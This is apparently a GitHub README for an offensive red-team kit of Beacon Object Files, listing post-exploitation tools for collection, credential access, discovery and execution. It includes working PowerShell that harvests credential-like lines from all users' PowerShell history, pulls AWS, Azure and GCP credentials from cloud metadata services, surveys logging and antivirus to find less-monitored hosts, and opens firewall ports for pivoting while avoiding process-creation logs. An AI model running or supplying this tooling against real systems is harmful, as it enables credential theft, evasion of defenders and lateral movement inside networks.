Adrenaline BOF Kit

June 22, 2026 · View on GitHub

A C2-agnostic collection of Beacon Object Files (BOFs) for red team and offensive security operations. BOFs are organized by attack chain phase and designed to be small, modular, and automation-friendly for use in reconnaissance, enumeration, and post-exploitation workflows.

Table of Contents (MITRE taxonomy)

Collection
Community
Credential Access
Discovery
Execution

Collection

| BOF | Use |
|---|---|
| ai_surface | Maps AI tooling on Windows developer endpoints and highlights configuration artifacts that may expose server definitions, commands, arguments, and embedded credentials. |
| clipboard_grab | Retrieves text from the Windows clipboard using Win32 APIs and returns the contents to the callback. Original code credits: @rvrsh3ll |
| ide_extension_surface | Enumerates VS Code, Cursor, Windsurf, Zed, Insiders, OSS, and server/remote extension manifests from per-user profile roots and summarizes extension identity, activation events, and capability signals. |
| powershell_history | Collects PowerShell history artifacts from the default PSReadLine and transcript locations. Useful for locating credentials or infrastructure. |
| window_handles_enum | Enumerates window handles across all system processes and uses a legitimate window handle to access the clipboard. |
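
The sweep that powershell_history performs, written out as an added PowerShell example (this is not the kit's BOF, which does the same from the implant process in C). It walks every local profile for PSReadLine history files, picks up transcripts from the default Documents location or from the policy-configured OutputDirectory, and flags lines that match credential-like patterns. The profile root layout and the pattern list are assumptions to tune for the target.

```powershell
# Added example (not part of the Adrenaline BOF Kit): collect PSReadLine history
# and PowerShell transcripts for every local profile and flag credential-like lines.
# Reading other users' profiles needs local admin; otherwise only the caller is covered.

# Assumed patterns for "looks like a credential"; extend for the environment at hand.
$CredPatterns = @(
    'ConvertTo-SecureString',
    '-Password\s',
    '-Credential\s',
    'net\s+use\s.*\s/user:',
    'Password\s*=',
    'AKIA[0-9A-Z]{16}',                 # AWS access key ID shape
    'secret|token|apikey|api_key'
)
$Regex = [regex]::new(($CredPatterns -join '|'), 'IgnoreCase')

function Get-PSHistoryArtifacts {
    $files = [System.Collections.Generic.List[string]]::new()

    # Per-user PSReadLine history: %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\*.txt
    $profileRoot = Split-Path $env:USERPROFILE -Parent   # usually C:\Users (assumption)
    foreach ($user in Get-ChildItem -Path $profileRoot -Directory -ErrorAction SilentlyContinue) {
        $hist = Join-Path $user.FullName 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine'
        if (Test-Path $hist) {
            Get-ChildItem -Path $hist -Filter '*.txt' -ErrorAction SilentlyContinue |
                ForEach-Object { $files.Add($_.FullName) }
        }
        # Default transcript location when no OutputDirectory policy is set: the user's Documents folder.
        $docs = Join-Path $user.FullName 'Documents'
        Get-ChildItem -Path $docs -Filter 'PowerShell_transcript.*.txt' -ErrorAction SilentlyContinue |
            ForEach-Object { $files.Add($_.FullName) }
    }

    # When transcription is enforced by policy, transcripts live under OutputDirectory instead.
    $tx = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription' -ErrorAction SilentlyContinue
    if ($tx -and $tx.EnableTranscripting -eq 1 -and $tx.OutputDirectory) {
        Get-ChildItem -Path $tx.OutputDirectory -Recurse -Filter 'PowerShell_transcript.*.txt' -ErrorAction SilentlyContinue |
            ForEach-Object { $files.Add($_.FullName) }
    }
    return $files
}

function Find-CredentialLines {
    param([string[]]$Paths)
    foreach ($p in $Paths) {
        $n = 0
        foreach ($line in Get-Content -Path $p -ErrorAction SilentlyContinue) {
            $n++
            if ($Regex.IsMatch($line)) {
                [pscustomobject]@{ File = $p; Line = $n; Text = $line.Trim() }
            }
        }
    }
}

$artifacts = Get-PSHistoryArtifacts
"[*] {0} history/transcript files found" -f $artifacts.Count
Find-CredentialLines -Paths $artifacts | Format-Table -AutoSize -Wrap
```

The policy key matters in practice: environments that enforce transcription typically point OutputDirectory at a share or a per-host folder, and those transcripts capture full command lines, including the ones the operator types, so they are also evidence of your own activity.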

Community

| BOF | Use |
|---|---|
| notepad_grab | Extracts plain text directly from open Notepad windows by reading process memory, recovering unsaved or in-memory notes from live endpoints. Original source: NoteThief |
| schtask_enum | Enumerates scheduled tasks through the Task Scheduler COM interface and summarizes each task's state, schedule, and configuration without flooding the beacon with raw XML. Original source: TrustedSec CS-Situational-Awareness-BOF |
| net_use | Adds, lists, or removes mapped drives via MPR. Modernized to manage memory properly and avoid crashes. Original source: TrustedSec CS-Situational-Awareness-BOF |
| session_view | Enumerates Windows Terminal Services sessions, displaying session IDs, usernames, domains, connection states, and session LUIDs. Original source: SessionView by lsecqt |

Credential Access

| BOF | Use |
|---|---|
| certstore_loot | Enumerates local certificate stores for certificates with exportable private keys and reports the path needed to export them. |
| cloud_metadata_check | Probes the cloud-local metadata services of AWS, Azure, and GCP from the current process and reports provider identity, instance context, and bounded credential snippets when reachable. |
| process_tokens_list | Enumerates accessible tokens of running processes, showing user context, token type (primary or impersonation), and impersonation level. Supports optional filtering by PID or process name. SeDebugPrivilege is left disabled by default for OPSEC, so processes the current token cannot already open are skipped. |
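
The probe that cloud_metadata_check describes, as an added PowerShell example rather than the kit's own code. It tries the three link-local metadata services with short timeouts, prints identity and instance context, and truncates any credential to a bounded prefix so the beacon output never carries a full secret. The endpoints and headers are the providers' documented ones; $SnippetLength and $Timeout are assumptions.

```powershell
# Added example (not the kit's cloud_metadata_check BOF): probe AWS, Azure and GCP
# metadata endpoints from the current host and show only a bounded credential prefix.

$SnippetLength = 12   # assumption: how many secret characters to reveal
$Timeout = 2          # seconds; these endpoints answer immediately or not at all

function Invoke-Imds {
    param([string]$Uri, [hashtable]$Headers = @{}, [string]$Method = 'GET')
    try {
        # Metadata must be reached directly; clear HTTP_PROXY/HTTPS_PROXY first if a proxy is configured.
        return Invoke-RestMethod -Uri $Uri -Headers $Headers -Method $Method -TimeoutSec $Timeout -ErrorAction Stop
    } catch { return $null }
}

function Limit-Secret {
    param([string]$Value)
    if (-not $Value) { return $null }
    $n = [Math]::Min($SnippetLength, $Value.Length)
    return $Value.Substring(0, $n) + '...(' + $Value.Length + ' chars)'
}

function Test-AwsMetadata {
    $base = 'http://169.254.169.254/latest'
    # IMDSv2 first: session token via PUT; if the PUT is blocked, fall back to unauthenticated v1.
    $token = Invoke-Imds -Uri "$base/api/token" -Method 'PUT' -Headers @{ 'X-aws-ec2-metadata-token-ttl-seconds' = '60' }
    $h = @{}
    if ($token) { $h['X-aws-ec2-metadata-token'] = $token }
    $doc = Invoke-Imds -Uri "$base/dynamic/instance-identity/document" -Headers $h
    if (-not $doc) { return $null }
    $out = [ordered]@{ Provider = 'AWS'; IMDSv2 = [bool]$token; AccountId = $doc.accountId; InstanceId = $doc.instanceId; Region = $doc.region }
    $roles = Invoke-Imds -Uri "$base/meta-data/iam/security-credentials/" -Headers $h
    if ($roles) {
        $role = ($roles -split "`n")[0].Trim()
        $creds = Invoke-Imds -Uri "$base/meta-data/iam/security-credentials/$role" -Headers $h
        $out.Role = $role
        if ($creds) { $out.AccessKeyId = $creds.AccessKeyId; $out.SecretPrefix = Limit-Secret $creds.SecretAccessKey }
    }
    [pscustomobject]$out
}

function Test-AzureMetadata {
    $h = @{ Metadata = 'true' }
    $inst = Invoke-Imds -Uri 'http://169.254.169.254/metadata/instance?api-version=2021-02-01' -Headers $h
    if (-not $inst) { return $null }
    $out = [ordered]@{ Provider = 'Azure'; SubscriptionId = $inst.compute.subscriptionId; ResourceGroup = $inst.compute.resourceGroupName; VmName = $inst.compute.name }
    # A managed-identity token is only issued if an identity is assigned to the VM.
    $tok = Invoke-Imds -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Headers $h
    if ($tok) { $out.TokenPrefix = Limit-Secret $tok.access_token }
    [pscustomobject]$out
}

function Test-GcpMetadata {
    $h = @{ 'Metadata-Flavor' = 'Google' }
    $base = 'http://metadata.google.internal/computeMetadata/v1'
    $proj = Invoke-Imds -Uri "$base/project/project-id" -Headers $h
    if (-not $proj) { return $null }
    $out = [ordered]@{ Provider = 'GCP'; ProjectId = $proj; InstanceName = (Invoke-Imds -Uri "$base/instance/name" -Headers $h) }
    $tok = Invoke-Imds -Uri "$base/instance/service-accounts/default/token" -Headers $h
    if ($tok) { $out.TokenPrefix = Limit-Secret $tok.access_token }
    [pscustomobject]$out
}

$results = @(Test-AwsMetadata; Test-AzureMetadata; Test-GcpMetadata) | Where-Object { $_ }
if ($results) { $results | Format-List } else { '[-] no metadata service reachable' }
```

The AWS branch is the one worth reading twice: when IMDSv2 is enforced, the unauthenticated v1 paths return nothing, and a host with a proxy configured will never reach 169.254.169.254 through that proxy, which is why the BOF probes from the process rather than through the system's HTTP stack settings.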

Discovery

| BOF | Use |
|---|---|
| amsi_etw_detect | Checks whether AMSI and ETW are active in the current process by looking for the loaded DLLs and ETW-related exports. Run across many beacons, it helps pick targets with less security instrumentation. |
| app_count | Counts installed applications via the registry, de-duplicates, and prints the total. Collected across many beacons, differences in app count help infer a device's role. |
| applocker_policy | Enumerates AppLocker policy configuration, rule collections, and enforcement modes from the relevant registry keys. |
| asr_status | Enumerates Windows Defender Attack Surface Reduction (ASR) rules from the registry to identify which rules are configured, their enforcement state (Block/Audit/Warn/Disabled), and the policy source (Intune/MDM vs Group Policy). |
| bitlocker_status | Enumerates BitLocker encryption status, policy configuration, and recovery key backup locations from the registry. |
| mdm_policy_artifacts | Scores MDM enrollment posture on Windows by evaluating indicators including join state, scheduled tasks, policy configuration, and enrollment artifacts. |
| netjoin_query | Queries domain join information and workstation details, identifying whether the system is domain-joined or in a workgroup. |
| power_state | Identifies the host form factor as Laptop, Desktop, Tablet, Server, Embedded, or Unknown from SMBIOS chassis data, with a power-status fallback. |
| proxy_enum | Enumerates Windows proxy configuration across WinINET, WinHTTP, policy keys, environment variables, WPAD indicators, Chrome settings, and .NET defaultProxy values. |
| tray_scout | Reports the taskbar host executable and enumerates system tray notification icon tooltips, with optional full image paths for the host and each icon's owning process. |
| user_idle | Reports the time since the user's last input and the GDI/USER handle counts of the current process, for timing intelligence. |
| wallpaper_enum | Enumerates the current desktop wallpaper path for each attached monitor via the IDesktopWallpaper COM interface. Centrally managed wallpapers often live on internal SMB shares or imaging servers, so the paths can reveal network paths, domain trusts, and policy enforcement without touching disk or the network. |
| wef_detect | Detects Windows Event Forwarding (WEF) configuration. If present, Security events are being forwarded to a central collector, which indicates centralized logging. |
| window_list | Enumerates the titles of all visible windows on the current user's desktop, optionally with process IDs. |
| wsc_status | Queries Windows Security Center health status, including Anti-Virus, Firewall, Anti-Spyware, the WSC service, Auto-Update, Internet Settings, and User Account Control. |
| win_version | Queries the registry and system APIs for a concise but detailed overview of the Windows installation. |
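
Four of the Discovery checks above (wef_detect, applocker_policy, wsc_status, netjoin_query) read the same registry and WMI sources, so here they are combined into one added PowerShell example that is not the kit's code. The WEF and AppLocker policy keys are the documented ones; the AppLocker EnforcementMode meaning (1 = enforce, 0 = audit, absent = not configured) and the Security Center productState decoding (bit 0x1000 = enabled, bit 0x10 = signatures out of date) follow the usual convention and are stated here as assumptions.

```powershell
# Added example (not the kit's BOFs): summarise WEF, AppLocker, Security Center AV
# and domain-join state from the registry/WMI sources the Discovery BOFs read.

function Get-WefSubscriptionManagers {
    # WEF clients store one string per collector under this policy key,
    # e.g. Server=http://wec.corp.local:5985/wsman/SubscriptionManager/WEC,Refresh=60
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager'
    if (-not (Test-Path $key)) { return @() }
    (Get-ItemProperty -Path $key).PSObject.Properties |
        Where-Object { $_.Name -match '^\d+$' } |
        ForEach-Object { $_.Value }
}

function Get-AppLockerEnforcement {
    # One subkey per rule collection; EnforcementMode 1 = enforce, 0 = audit, absent = not configured (assumption).
    $root = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2'
    $result = [ordered]@{}
    foreach ($coll in 'Exe', 'Dll', 'Msi', 'Script', 'Appx') {
        $k = Join-Path $root $coll
        $mode = 'NotConfigured'
        if (Test-Path $k) {
            $v = (Get-ItemProperty -Path $k -ErrorAction SilentlyContinue).EnforcementMode
            $rules = (Get-ChildItem -Path $k -ErrorAction SilentlyContinue | Measure-Object).Count
            if ($v -eq 1)     { $mode = "Enforce ($rules rules)" }
            elseif ($v -eq 0) { $mode = "Audit ($rules rules)" }
            else              { $mode = "Present, mode not set ($rules rules)" }
        }
        $result[$coll] = $mode
    }
    [pscustomobject]$result
}

function Get-SecurityCenterAv {
    # root/SecurityCenter2 exists on client SKUs only; servers return nothing here.
    Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Product  = $_.displayName
                Enabled  = (($_.productState -band 0x1000) -ne 0)
                UpToDate = (($_.productState -band 0x10) -eq 0)
                State    = ('0x{0:X6}' -f $_.productState)
            }
        }
}

function Get-HostPosture {
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    $scope = if ($cs.PartOfDomain) { $cs.Domain } else { $cs.Workgroup }
    [pscustomobject]@{
        Host              = $cs.Name
        DomainJoined      = $cs.PartOfDomain
        DomainOrWorkgroup = $scope
        WefCollectors     = @(Get-WefSubscriptionManagers)
        AppLocker         = Get-AppLockerEnforcement
        AntiVirus         = @(Get-SecurityCenterAv)
    }
}

Get-HostPosture | Format-List
```

A non-empty WefCollectors list is the signal wef_detect is after: it names the collector the host pushes Security events to, so anything you do on that host is visible off-box regardless of the local log state.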

Execution

| BOF | Use |
|---|---|
| com_probe | Probes whether a COM object can be instantiated from a given CLSID. |
| firewall_rule | Adds, removes, or queries Windows Firewall rules via the COM API (INetFwPolicy2) without spawning netsh.exe or cmd.exe. Useful for opening ports when pivoting inside networks. |
| service_control | Manages local Windows services via the SCM: query (capped list or single service), create, start, stop, delete, and configure failure actions. Changes usually require elevated rights. |
| wevt_logon_enum | Enumerates recent Security log logon-related events (4624 successful logon, 4625 failed logon, 4672 special privileges assigned) via the wevtapi API and prints the remote workstation name/IP and target username. |
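
What firewall_rule does through INetFwPolicy2, shown as an added PowerShell example that is not the kit's code: query rules, add an inbound TCP allow rule, and remove it again, all through the HNetCfg.FwPolicy2 COM object so no netsh.exe or cmd.exe child process is created. The rule name, port and remote address are placeholders for this example; adding and removing rules needs administrator rights, querying does not.

```powershell
# Added example (not the kit's firewall_rule BOF): manage Windows Firewall rules
# via the INetFwPolicy2 / INetFwRule COM interfaces instead of spawning netsh.exe.

$Policy = New-Object -ComObject HNetCfg.FwPolicy2

# Constants from the NET_FW_* enumerations
$NET_FW_PROFILE2_ALL    = 0x7FFFFFFF
$NET_FW_RULE_DIR_IN     = 1
$NET_FW_ACTION_ALLOW    = 1
$NET_FW_IP_PROTOCOL_TCP = 6

function Get-FwRuleSummary {
    param([string]$NameFilter = '*')
    # Enumerating $Policy.Rules is cheap; filtering client-side is the "query" operation.
    $Policy.Rules | Where-Object { $_.Name -like $NameFilter } | ForEach-Object {
        [pscustomobject]@{
            Name      = $_.Name
            Enabled   = $_.Enabled
            Direction = if ($_.Direction -eq $NET_FW_RULE_DIR_IN) { 'In' } else { 'Out' }
            Action    = if ($_.Action -eq $NET_FW_ACTION_ALLOW) { 'Allow' } else { 'Block' }
            Protocol  = $_.Protocol
            Ports     = $_.LocalPorts
            Remote    = $_.RemoteAddresses
            Program   = $_.ApplicationName
        }
    }
}

function Add-FwInboundTcpRule {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][int]$Port,
        [string]$RemoteAddress = '*',      # scope to the pivot source when possible
        [string]$Description = ''
    )
    $rule = New-Object -ComObject HNetCfg.FWRule
    $rule.Name            = $Name
    $rule.Description     = $Description
    $rule.Protocol        = $NET_FW_IP_PROTOCOL_TCP   # must be set before LocalPorts
    $rule.LocalPorts      = "$Port"
    $rule.RemoteAddresses = $RemoteAddress
    $rule.Direction       = $NET_FW_RULE_DIR_IN
    $rule.Action          = $NET_FW_ACTION_ALLOW
    $rule.Profiles        = $NET_FW_PROFILE2_ALL
    $rule.Enabled         = $true
    $Policy.Rules.Add($rule)
}

function Remove-FwRule {
    param([Parameter(Mandatory)][string]$Name)
    # Remove() deletes every rule with that name, so use a unique name when adding.
    $Policy.Rules.Remove($Name)
}

# Usage with placeholder values: allow TCP/4444 inbound from one host, check it, clean up.
Add-FwInboundTcpRule -Name 'Example Pivot 4444' -Port 4444 -RemoteAddress '10.0.0.5' -Description 'added example'
Get-FwRuleSummary -NameFilter 'Example Pivot*' | Format-Table -AutoSize
Remove-FwRule -Name 'Example Pivot 4444'
```

The OPSEC gain is narrower than it looks: no process creation or command-line event is produced, but a rule change still lands in the Windows Firewall With Advanced Security operational log, so the name and scope you pick are what a defender will read.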

DISCLAIMER: The creators and contributors of this repository accept no liability for any loss, damage, or consequences resulting from the use of the information or code contained in this repo. By utilizing this repo, you acknowledge and accept full responsibility for your actions. Use at your own risk.